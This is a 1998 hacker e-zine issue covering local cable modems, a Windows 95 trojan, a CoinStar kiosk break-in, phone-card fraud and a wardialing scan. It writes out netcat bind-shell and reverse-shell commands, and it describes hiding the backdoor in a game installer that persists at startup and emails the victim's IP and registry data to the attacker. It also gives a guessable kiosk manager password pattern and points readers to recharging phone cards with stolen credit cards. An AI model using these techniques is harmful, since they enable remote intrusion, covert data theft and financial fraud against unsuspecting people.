_____________________________________________ / \ | ___________________________________ | | | | | | | | | | | | | | | | | | | | | _________| | | | | | / \ | | | | / \ | | | | / \ | | | |__________/ \__________| | | / | \ | | / | \ | | / | \ | | /______________|______________\ | | | | Computer Academic Underground | | | | Electronic Magazine | | #0019 | | 0515.98 | \ _____________________________________________ / ############################################################################## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ============================================================================== ------------------------------------------------------------------------------ .............................................................................. Table of Contents Foreward General Member Listing -= CAU =- Cablemodem Info For 817 Area uv Hacking NetKitten With Hats protocol Magical Coins sandspidr Exploit of the Month -= CAU =- Phreaking Rechargable Phone Cards I)ruid 817.788.XXXX -= CAU =- Local Scene Bulletin Board Systems -= CAU =- 817 2600 Meeting -= CAU =- Closing ############################################################################## Foreward Well, this month we seem to have a great issue. Excellent article by Protocol, and an article on Coinstar machines from the first contributor to the zine that I actually have no idea who he is (everyone that has contributed up until now I either know in person or from IRC). Anyway, the 817 2600 meeting is growing, with more and more attendee's every month, so check out the 2600 information below, and if your in the area, show up! I've also decided to add a section that may or may not appear in future issues called "Local Scene", where we will try to keep an updated list of local (817, 972, 214) BBS's, meetings, and other local related stuff. Also, if your not on the HackIt! development list, a little update: I have just about got done with the redesign, and will probably be able to relelase HackIt! 2.0.0 sometime in the next month or so, and there's also a Windows 95 version that's almost done as well. Anyway, that's all the updates for this month, on to the articles... I)ruid ############################################################################## General %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Member Listing (In the order in which they were brought into the CAU) Handle IRC Nick E-Mail -------------------------------------------------------------- I)ruid I}ruid druid@caughq.org ultra violet uv_ uv@caughq.org Crimson Assassin Crimson_A crimson@caughq.org Fizban Fizban^ fizban@caughq.org Sublime sublime sublime@caughq.org int3l int3l int3l@caughq.org MajestiX maJesTix majestix@caughq.org -------------------------------------------------------------- -= CAU =- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Cablemodem Info For 817 Area There has been cable modem hype for about 1/2 a year and finally the're in 817! (or at least almost) There is a working demo of a cable modem at CompUSA off of 183 in Hurst. I have recently called a few local providers; TCI and Marcus. TCI seems to have operators that just bull shyt. Three different operators gave me three different dates when cable modems would be offered in my area. Marcus seems to be a little more orginized. INFO: #'s: 817.429.1096 817.577.9577 Installation and modem purchase: $299.00 *note this operator told me you had to buy the modem, however, if you decied you didn't want the service they would buy it back. Monthly: if you have Marcus Cable I was told $39.95/month Tech: Supposedly you are not allowed to host a web page (yea right) when you sign up you get a static ip (they issue them with DHCP). *YUCK* They told me they use DHCP just so it would be easier to update info. Modem info: the coax plugs into the back of modem (external) the modem plugs into netcard via coax. Requirments(supposedly): win95/NT Network card 10 mb (I'm assuming for thier software) 16 mb (software) *note: I don't see any reason you couldn't use any OS that supports routing through ethernet cards. SPEED!: The guy at Marcus said that it averages out to about 1-3mbs/s. He also said that it depends on the time of day. Probably a high of 9mb/sec at slow times, like 3am perhaps. Conclusion: For any net addict that desires a rather fast dedicated connection to the net, start saving yer lunch money. l8r -uv 98 ############################################################################## Hacking %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% NetKitten With Hats Well my pets we are long overdue for a Trojan and what better way to make use of those pesky Win 95 boxes than to put up a telnet server? Well netcat out of the box does this with just one command-line: nc -L -d -p 23 -e c:\command.com The -L makes nc listen again after a disconnect. The -d is to detach from console (a stealth feature). The p is for... well if you can't figure it out don't bother reading further. The -e hooks up to input/output of the program to netcat. Now the next thing we need is a delivery method for this command. Colidus and I decided on a south park game. The original setup program was renamed and a batch file was created that copied our copy of nc (renamed system32 so the user wouldn't kill it when seen in task list) and ran regedit which imported a .reg file that launched our program at startup. Now this is all well and good, but it doesn't tell us when this machine is ready to use. So we made a batch file for nc that ran the win95 equivalent of ifconfig and dumped the machine's ip to a file and mailed it to a hotmail account (gotta love the hotmail guys). So this works great right? Well my so easily satisfied reader NO! Several bad things: we're using an external command to get the machine's IP, we're using a batch file, and this method will not allow free access to a machine behind a firewall. So to stop the first two problems we needed the source to nc. Easy enough, it's in the tgz or zip. [ EDITOR'S NOTE: This is so that a routine to grab the local IP can be hardcoded into netcat, as well as code to grab registry keys and generate the machine ID (explained below). ] So now for the second problem, how to get to a machine that's behind a firewall. Well you could push the shell (command.com) to yourself by making the machine behind the firewall start the connection. This is allowed by most firewall configurations. You could beef it up a bit by using port 53 (a DNS request) which is almost always allowed, or using multiple ports requests until one goes thru although this might set off alarms. Machine behind firewall Listening Machine ------------------------------------ |-| --------------- | | |F| | | | nc -e command.com target.com 23 |_1024+__|W|___23___| nc -L -p 23 | | | | | | | ------------------------------------ |-| --------------- Looks great but it doesn't work. It's not nc's fault it's command.com's. Command.com doesn't handle stdin/stdout correctly so we had to find a replacement for it. We popped on #cdc and asked weld about it, but he had not heard of this bug (and hadn't tried to push a shell to a listening machine) but he tried it on Windows NT and it worked. I remembered 4dos from days gone by and went about finding it. Colidus tested 4dos but, it was a bust. Because Windows NT worked, he tried 4NT (4dos for NT) on the 95 machine and it worked like a charm. The next problem was getting the IP and port number for the listening machine to the attacking machine. This could be hard-coded, but that would be easy to track down and doesn't let you use dynamic IP's and only lets have one connection at a time. So instead we decided to have the machine grab a random number and use that as an ID. Then e-mail that with the IP and some registry keys (ones for machine name, e-mail address, user name, etc.) and then check a web page (geocities for example) for commands to execute. Those commands can be anything (some examples are below) that you can type in the 'run' command from the Win 95 Start bar. Be aware that lots of commands that are run can be seen by the user. One command is of course to forward 4NT. I'll leave you with a few other's, but you can always use your imagination: Net view Net use whatever Start www.caughq.org echo gotcha now sucker! > c:\gotcha.txt Start notepad c:\gotcha.txt Start blank.scr (lots of fun if you d/l a password protected screen saver) ftp -s script.txt (had some problems with this using command.com but haven't tried w/4nt) del *.* (just kidding don't do anything I wouldn't do) start marquee.scr (even better than blank with a funny message and password protected) Protocol the way things talk to other things [ EDITOR'S NOTE: I)ruid and Colidus demonstrated this hack on CNN World News. We will have an AVI of the broadcast on the CAUGHQ website as soon as I can get ahold of it. ] %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ~~ MAGICAL COINS ~~ Have you ever seen those nasty little green machines at your supermarket called "CoinStar?" These wastes of data will count your change and take 10 cents out of every dollar! After looking at this peice of shit machine for a few minutes, I noticed a phone cord running out of the back of it, so I followed the cord halfway around the store to a phone jack. It had a phone number written on it, so I wrote it down for later use. Later that evening I dialed the number and got connected at 14.4bps. It then brought me to a login prompt. From here I was a bit stumped. So I did a "pretext" call to 1-800-644-COIN (CoinStar Customer Service). Though the operator wasnt to shabby on giving me the information I wanted, I managed to get alot of info. I found that managers of the store login as: "manager" and their pin number is between 4-8 digits. The software is made by a company called QNX. [ EDITOR'S NOTE: The company is actually QNX Software Systems, Ltd. (http://www.qnx.com), creators of the QNX Operating System ] The O/S is QNX version 4.22. (you will see what version it is by connecting to the machine) After about 10 tries at the password, I finally got in. Login as "manager" and use the stores id number ex: 789. The password usually repeats, so it would be 789789. Most of these machines are found in Giant Eagles'. [ EDITOR'S NOTE: In the Dallas/Fort Worth area, check Tom Thumb Supermarkets ] If you want to find a CoinStar machine nearest you, goto their page... http://www.coinstar.com. After looking around for about 35 minutes, I realized that I could change the color, language, and money returns. I realized that I could make the machine give money instead of taking 10 cents off a dollar, but I'm not some coin thief and didnt want to get busted over some lame ass coins. If someone does decide to change the money outgoing... I DO NOT take responsibilty for your actions. HAVE PHUN sandspidr sandspidr@usa.net %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Exploit of the Month This month's exploit of the month goes to the vulnerability in the Xaw and neXtaw widgets. These widgets contain some code that does not properly bounds check, resulting in code that can be overflowed to smash the stack and gain a rootshell. Some older suid X programs such as xterm contain this code, and xterm was used for the exploit, however, other X programs contain this code as well. Exploit code is contained in the external file "xterm.Xaw_exp.c". This exploit was recently reported to the Bugtraq mailing list. -= CAU =- ############################################################################## Phreaking %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Rechargable Phone Cards This month I'm going to introduce you all to the wonderous Rechargable Phone Card. This little card provided by New Media Telecommunications, Inc. (http://www.nmti.net) which can be obtained for free from a number of sources. Here locally, you can find them at gas stations and vendors at the First Saturtday Sidewalk Sale. If you feel like paying a startup fee, you can recieve about 150 of these cards from New Media Telecommunications, and recieve a commission every time someone uses one of the cards out of your pack. However, the money making oppertunities are not why I'm writing this article, although they are worth a mention. The beauty of this little card is the fact that it's a completely automated system. There is no human representative to talk to at all. What this means is that when you recharge your card, it's a touch-tone system, making it extremely easy to use a fraudulent credit card, or some other electronic method of payment to recharge your card. From any touch tone phone you can dial their 800 number (1.800.739.5253), enter your authorization code at the prompt (found on your individual rechargable phone card), and from then on, have access to a range of functions including domestic calls, international calls, as well as the option to recharge your card using VISA, MasterCard, American Express, or Discover, and check the ballance existing for that particular card, all compelety automated. After you have entered your authorization code, domestic calls are made by dialing "1", the area code, then the number. International calls are made by dialing "011", then the country code, then the city code, then the telephone number. To recharge your card, you simply hit "#" and the Credit Card number, and for additional calls or your current ballance, you simply hit "**". You can recharge your card through this system, or by sending a check or money order with your Authorization Code to P.O. Box 12109, La Jolla, CA 92039, but why would anyone want to do that when it's so easy to recharge it via your touch tone phone. Each card has a Commission Identification Number printed in the lower right-hand corner, identifying the vendor whom is making commission off of each and every call you make using that card. Also printed on every card is the New Media Telecommunications Customer Service Number, which is 1.619.558.3337. Obviously you people that find credit card fraud not to be a problem will find this freely available phone card a valuable resource, however I don't condone using other people's credit cards, unless you don't mind this company having logs of everyone you call using each individual card, and sending law enforcement to your house after you abuse someone elses credit card. I)ruid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 817.788.XXXX 788.0434 : CONNECT No Response 788.0496 : CONNECT No Response 788.0512 : CONNECT User Access Verification \ Password: 788.0829 : CONNECT Garbage 788.0836 : CONNECT NO ANSWER 788.1342 : CONNECT No Response 788.1609 : CONNECT Garbage 788.2016 : CONNECT No Response 788.2351 : CONNECT User Access Verification \ Username: 788.3214 : CONNECT U$oOo>.U$oOo>.U$oOo>. 788.3303 : CONNECT Garbage (repeating) 788.3305 : CONNECT same as 788.3303 788.3307 : CONNECT same as 788.3303 788.3393 : CONNECT Please press ... \ Enter login name: 788.4015 : CONNECT m[^'~yv' \ NO CARRIER 788.5074 : CONNECT No Response 788.5153 : CONNECT Answering Machine during the Day? 788.5367 : CONNECT No Response 788.5609 : CONNECT No Response 788.5790 : CONNECT PLEASE LOG IN 788.5876 : CONNECT > 788.5934 : CONNECT NO ANSWER 788.6197 : CONNECT No Response 788.7115 : CONNECT NO ANSWER 788.7235 : CONNECT No Response 788.7310 : CONNECT